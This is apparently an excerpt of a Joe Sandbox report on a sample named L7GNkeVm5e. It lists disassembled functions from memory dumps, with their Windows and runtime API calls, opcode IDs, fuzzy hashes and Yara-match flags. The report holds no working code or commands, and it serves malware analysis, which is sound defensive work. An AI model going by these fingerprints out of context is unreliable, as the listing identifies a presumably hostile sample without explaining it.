                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                                                                                                                                                                  • String ID: <(@
                                                                                                                                                                                                                                                  • API String ID: 3213686812-4189137628
                                                                                                                                                                                                                                                  • Opcode ID: 66e0b01c820f3c016cb479e2b3e6a53e6d0229a994ecfa947a89fafbf06fb01a
                                                                                                                                                                                                                                                  • Instruction ID: c42ad4fc6a3a459dd0b6f73910b388841d309234efd3d08c580d18ad64b54486
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66e0b01c820f3c016cb479e2b3e6a53e6d0229a994ecfa947a89fafbf06fb01a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CCF02761B8432635FA2037B27D0BBAB19150F14B0DF96003FFF0A995C3DEAC955040AD
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 004394FD: GetEnvironmentStringsW.KERNEL32 ref: 00439501
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0042FA4F
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0042FA56
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$EnvironmentStrings
                                                                                                                                                                                                                                                  • String ID: Ub$ Ub
                                                                                                                                                                                                                                                  • API String ID: 3523873077-2651688039
                                                                                                                                                                                                                                                  • Opcode ID: 74b13d0fcde66366100e3dca1cb45a37efbb8a6426e7ea2b6f327c2869fbdbbd
                                                                                                                                                                                                                                                  • Instruction ID: 08707e55e404d2c76e2f6eae856c7126cd4318a61dcb705a42d68a92314f0541
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74b13d0fcde66366100e3dca1cb45a37efbb8a6426e7ea2b6f327c2869fbdbbd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0EE0ED12F0592142E632B63B3C02A6A06144B8177EFD0423FE828D61C2DE6C880B029F
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,00431F4D), ref: 0042DF89
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
                                                                                                                                                                                                                                                  • ExitThread.KERNEL32 ref: 0042DFCA
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                                                                                                                                                                  • String ID: <(@
                                                                                                                                                                                                                                                  • API String ID: 3213686812-4189137628
                                                                                                                                                                                                                                                  • Opcode ID: 7b487a85bde145f5f6618f4d2cac6f1d463b179069c0564edcd31255594901e1
                                                                                                                                                                                                                                                  • Instruction ID: 8d9534a8efac39963163d02413269ee71f33911fb9a211fcd458cde81c8fda17
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b487a85bde145f5f6618f4d2cac6f1d463b179069c0564edcd31255594901e1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08F0A061B8431635FA203BA1BD0BB9619254F14B09F56002BBE0AA95D2DAA9955041AD
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242E9
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004242FB
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00424309
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID: pScheduler
                                                                                                                                                                                                                                                  • API String ID: 1381464787-923244539
                                                                                                                                                                                                                                                  • Opcode ID: 27a4b28832b8d2c4d1e169b8d68e757cb4f39c4e60a74ca0ff363d542ca72071
                                                                                                                                                                                                                                                  • Instruction ID: 0ab47ed57e3114165a5b8518f1ff4cdc14a790a58e52e99d458785ee7c9320ad
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27a4b28832b8d2c4d1e169b8d68e757cb4f39c4e60a74ca0ff363d542ca72071
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7F0A731B01224A7CB18FB56E852D9E73A99E40304791826FF806A3182DFBCA948C65D
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E62F
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E642
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E650
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID: pContext
                                                                                                                                                                                                                                                  • API String ID: 1990795212-2046700901
                                                                                                                                                                                                                                                  • Opcode ID: 94c991bbb4e237fce74e38a70429fd430151592173fe111bbf2d82945a6f33d3
                                                                                                                                                                                                                                                  • Instruction ID: 74844cc6af7f8c94541e855de6513edd01ccc4ed259e70f51b8aa0ea99782ad2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 94c991bbb4e237fce74e38a70429fd430151592173fe111bbf2d82945a6f33d3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9EE06139B0011427CB04FB65DC06C5DB7A8AEC0714390413BF905A3381DFB8AD0585CC
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DAA
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DB8
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID: pScheduler$version
                                                                                                                                                                                                                                                  • API String ID: 1687795959-3154422776
                                                                                                                                                                                                                                                  • Opcode ID: 464dda17272c5f92190f115bd46177522cd506029ea0a62d1c7ec35c5c4aaa01
                                                                                                                                                                                                                                                  • Instruction ID: 78896325b6b5d70010e1ee9e49f38da00e370817edf74f3b448257e365f7b275
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 464dda17272c5f92190f115bd46177522cd506029ea0a62d1c7ec35c5c4aaa01
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99E08630900608F6CB14EE56D80EBDD77A45B51749F61C1277819610929BBC96C8CB4E
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1036877536-0
                                                                                                                                                                                                                                                  • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                                                                                                                                                                  • Instruction ID: bca4f3389f7aef3b321b47e138c454c1308b116cb1c02f017d73c82a305e3271
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65A14872A00B869FEB15DE18C8917AEFBE1EF19310F28426FD5859B381C23C9D41C759
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1036877536-0
                                                                                                                                                                                                                                                  • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                                                                                                                                                                  • Instruction ID: 330b06f54b1cb772a32a339cc390573f4c85f9a78d97025bfd9fbf4a6f143f22
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FAA1997198038ABFEB27CF18C8907AEBBE7EF09714F54416DD5959B280C7398981CB50
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                                  • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                                                                                                                                                                  • Instruction ID: f2494f1ef04ef44517cd1171a85dede66e5513e309315ffa42068036143921cc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 57410771E00210ABDB257BBADC42AAF7664EF5E374F14127FF41882391D73C590946A9
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                                  • Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                                                                                                                                                                                  • Instruction ID: 58c3e2fa005fd759e83bc5036426c2f7ef0dfa228269a38520d536ea35a09156
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE412A31EC01186FDB276FB88C4CBAE3BA7EF05770F140615F428D7690DB3654528AA1
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,0213046A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 02136B41
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02136BCA
                                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 02136BDC
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 02136BE5
                                                                                                                                                                                                                                                    • Part of subcall function 021338FE: RtlAllocateHeap.NTDLL(00000000,0210DACD,00000000), ref: 02133930
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2652629310-0
                                                                                                                                                                                                                                                  • Opcode ID: 6691954612650c490b0f1db7a760fe6ab7f85cafeb43cd7dd41aaf3ed81f1cf0
                                                                                                                                                                                                                                                  • Instruction ID: aba4259d9df7f4e671a64490cc3de3b8f7b45cb7d89d1dc91f4510544bf8dab4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6691954612650c490b0f1db7a760fe6ab7f85cafeb43cd7dd41aaf3ed81f1cf0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE31CD72A4024AAFDF268F64DC85DEE7BAAEF00714B040268EC04D7194EB35D954CFA4
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 531285432-0
                                                                                                                                                                                                                                                  • Opcode ID: 9c244af1b80992c8c5c11ff33a9a240242c4a027173cbb81dbc6de2572cd5d43
                                                                                                                                                                                                                                                  • Instruction ID: d103751f5e86bb577f21b0ef41fc0747bac1fbbf4bb65c452d8b20089be38efe
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c244af1b80992c8c5c11ff33a9a240242c4a027173cbb81dbc6de2572cd5d43
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7217C75E0021A9FDF00EFA5CC829AEB7B8EF09714F10007AF901B7291D778AD058BA5
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 531285432-0
                                                                                                                                                                                                                                                  • Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                                                                                                                                                                  • Instruction ID: 1fd2a18eeb5e86514120d7b23ca03b198f9e111abe4465f2867249718fccbdf8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E214C75A40209AFDF14EFE4DD819BEBBB9EF09710F100065E905A7290DBB4AD028FA1
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,00000000), ref: 00423729
                                                                                                                                                                                                                                                  • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423711
                                                                                                                                                                                                                                                    • Part of subcall function 0041B71C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B73D
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0042375A
                                                                                                                                                                                                                                                  • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423783
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2630251706-0
                                                                                                                                                                                                                                                  • Opcode ID: 0708c55e9bf2983c6b837536b85e823e81494798a28270a3cf60b9b0231776e7
                                                                                                                                                                                                                                                  • Instruction ID: fbbc1a7e5a16338d661a11365c58371bffdd4c48ac4c368ddaba424d9e7313e5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0708c55e9bf2983c6b837536b85e823e81494798a28270a3cf60b9b0231776e7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5911E9747002146BCF04AF659C85DAEB765EB84761B144067FA059B392CBAC9D41C698
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000005), ref: 00401FA5
                                                                                                                                                                                                                                                  • UpdateWindow.USER32 ref: 00401FAD
                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00401FC1
                                                                                                                                                                                                                                                  • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 00402024
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Window$Show$MoveUpdate
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1339878773-0
                                                                                                                                                                                                                                                  • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                                                                                                                                                                  • Instruction ID: 53ee9dd5e88c5c6849e3e7895ae91ae42f7fd804de43801a61d80981d891571f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90016531E006109BC7258F19ED04A267BA7FFD5712B15803AF40C972B1D7B1AC428B9C
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 004290D3
                                                                                                                                                                                                                                                    • Part of subcall function 00429020: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042904F
                                                                                                                                                                                                                                                    • Part of subcall function 00429020: ___AdjustPointer.LIBCMT ref: 0042906A
                                                                                                                                                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 004290E8
                                                                                                                                                                                                                                                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 004290F9
                                                                                                                                                                                                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 00429121
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 737400349-0
                                                                                                                                                                                                                                                  • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                  • Instruction ID: 9a28eba3c49a40873050ba514f30250a61a7a586528b59ff06f814ea835fedb3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55014032200159BBDF116E96EC41EEB7F7AEF48758F444009FE4896121C73AEC61DBA8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 0212933A
                                                                                                                                                                                                                                                    • Part of subcall function 02129287: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 021292B6
                                                                                                                                                                                                                                                    • Part of subcall function 02129287: ___AdjustPointer.LIBCMT ref: 021292D1
                                                                                                                                                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 0212934F
                                                                                                                                                                                                                                                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 02129360
                                                                                                                                                                                                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 02129388
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 737400349-0
                                                                                                                                                                                                                                                  • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                  • Instruction ID: e16e1acfb26e9253f041095d316bb579df595a44325c592ac9b6bba639f8e129
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85011372140158BFDF126EA9CD40EEB3B6AEF88754F154008FE08A6120D332E875ABA0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue), ref: 00434F51
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431F9C), ref: 00434F5D
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F6B
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                                                                                                                                  • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                                  • Instruction ID: 0dde809cff85efe1a06f082dffa05588a2f4c4b6f5b2494ffdd5bda6add1d188
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3401FC36615322AFC7214F69AC449A77B98AF89FA1F241531F905D7240D724E90186E8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0213512D,00000000,00000000,00000000,00000000,?,021353E5,00000006,0044A378), ref: 021351B8
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0213512D,00000000,00000000,00000000,00000000,?,021353E5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,02132203), ref: 021351C4
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0213512D,00000000,00000000,00000000,00000000,?,021353E5,00000006,0044A378,0044A370,0044A378,00000000), ref: 021351D2
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                                                                                                                                  • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                                  • Instruction ID: 46d544d2c035367c2598792d42eafe4cf64ee6db9d177d79508badef7692c312
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C01F736692222BBC7324F699C44A67779BAF0AFA27610630F906D7140C720D901CAE4
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426138
                                                                                                                                                                                                                                                  • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042614C
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426164
                                                                                                                                                                                                                                                  • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042617C
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
